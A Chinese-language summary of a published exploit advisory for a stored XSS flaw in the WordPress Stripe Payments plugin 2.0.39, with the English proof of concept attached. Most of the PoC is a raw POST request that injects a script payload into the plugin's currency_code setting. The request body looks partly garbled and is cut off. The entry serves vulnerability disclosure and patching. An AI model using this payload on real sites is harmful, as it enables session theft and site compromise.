漏洞概述 漏洞名称: WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS EDB-ID: 49354 作者: Park Won Seok 类型: Webapps 平台: PHP 日期: 2021-01-05 描述: 在WordPress插件stripe-payments (Ver. 2.0.39)中发现了一个存储型跨站脚本(XSS)漏洞。漏洞参数为 "AcceptStripePayments-settings[currency_code]"。 影响范围 受影响版本: Stripe Payments 插件版本 2.0.39 测试环境: Windows 10 x64 修复方案 建议: 更新到最新版本的Stripe Payments插件,以修复此存储型XSS漏洞。 POC代码 ```plaintext Exploit Title: WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS Date: 04-01-2021 Software Link: https://wordpress.org/plugins/stripe-payments/#developers Exploit Author: Park Won Seok Contact: kkjng39@gmail.com Category: Webapps Version: stripe-payments (Ver. 2.0.39) Tested on: Windows 10 x64 description: A Stored Cross-site scripting (XSS) was discovered in wordpress plugins stripe-payments (Ver. 2.0.39) Vulnerability parameters : "AcceptStripePayments-settings[currency_code]" have Cross-Site Scripting. POC - Stored Cross-Site Scripting POST /wp-admin/options.php HTTP/1.1 Host: localhost Content-Length: 5786 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.31.131/wp-admin/edit.php?post_type=products&page=stripe-payments-settings Accept-Encoding: gzip, deflate Accept-Language: ko,en-US;q=0.9,en;q=0.8 Cookie: wordpress_5b1d751a3da8a97505638936b7963ae=root%7C1609074082%7C6vG1LxkNE1t2BmRmyy21wfVgpGnt1QfEhEWLDGHf%7C508cb8bc44cd6f wordpress_test_cookie=WP_CookieCheck; wordpress_logged_in_5b1d751a3da8a97505638936b7963ae=root%7C1609074082%7C6vG1LxkNE1t2BmRmyy21wfVgpGnt1QfEhEWLDGHf%7C3e51 asp_transient_id=36985c314be2b5205e14586c592c87d0; wp-settings-1=fold%3D0o26editort%3Dhtml%26posts_list_mode%3Dlist; wp-settings-time-1=1608993490 Connection: close wp-asp-urllashgeneralOption_page=AcceptStripePayments-settings-group&action=update&advanced_options%5B%5D=edit.php%3Fpost_type%3Dasp-products%26page%3Dstripe-payments-settings%26AcceptStripePayments-settings%5Bcheckout_url%5D=http%3A%2F%2F192.168.31.131%2Fproducts%2F%26AcceptStripePayments-settings%5Bcheckout_products%5D%5Bpage_url_value%5D=http%3A%2F%2F192.168.31.131%2Fproducts%2F%26AcceptStripePayments-settings%5Bcurrency_code%5D=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&AcceptStripePayments-settings%5Bcurrency_symbol%5D=%24&AcceptStripePayments-settings%5Bbutton_text%5D=Buy+Now&AcceptStripePayments-settings%5Bpopup_button_text%5D=Pay+%25s&AcceptStripePayments-settings%5Bcheckout_lang%5D=en&AcceptStripePayments-settings%5Bpopup_default_country%5D=&AcceptStripePayments-settings%5Bapi_publishable_key%5D=&AcceptStripePayments-settings%5Bapi_secret_key%5D=&AcceptStripePayments-settings%5Bapi_publishable_key_test%5D=&AcceptStripePayments-settings%5Bapi_secret_key_test%5D=&AcceptStripePayments-settings%5Bbuyer_email%5D=&AcceptStripePayments-settings%5Bfrom_email_address%5D=test%2B3sales%40buyr-domain.com%26AcceptStripePayments-settings%5Bbuyer_email_subject%5D=Thank+you+for+your+purchase&AcceptStripePayments-settings%5Bapi_publishable_key%5D=&AcceptStripePayments-settings%5Bapi_secret_key%5D=&AcceptStripePayments-settings%5Bbuyer_email_subject%5D=Thank+you+for+your+purchase%21+You+ordered+the+following+item%28%29%3A%0D%0A&google.com+%3Chttp%3A%2F%2F4naver.com%2F%26AcceptStripePayments-settings%5Bseller_email%5D=test%3Dtext%26AcceptStripePayments-settings%5Bseller_email_subject%5D=Notification+of+product+sale&AcceptStripePayments-settings%5Bseller_email_body%5D=Dear+seller%0D%0AYou%0D%0AThank+you+for+your+purchase%21+You+ordered+the+following+item%28%29%3A%0D%0A%0D%0A%28product_d%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%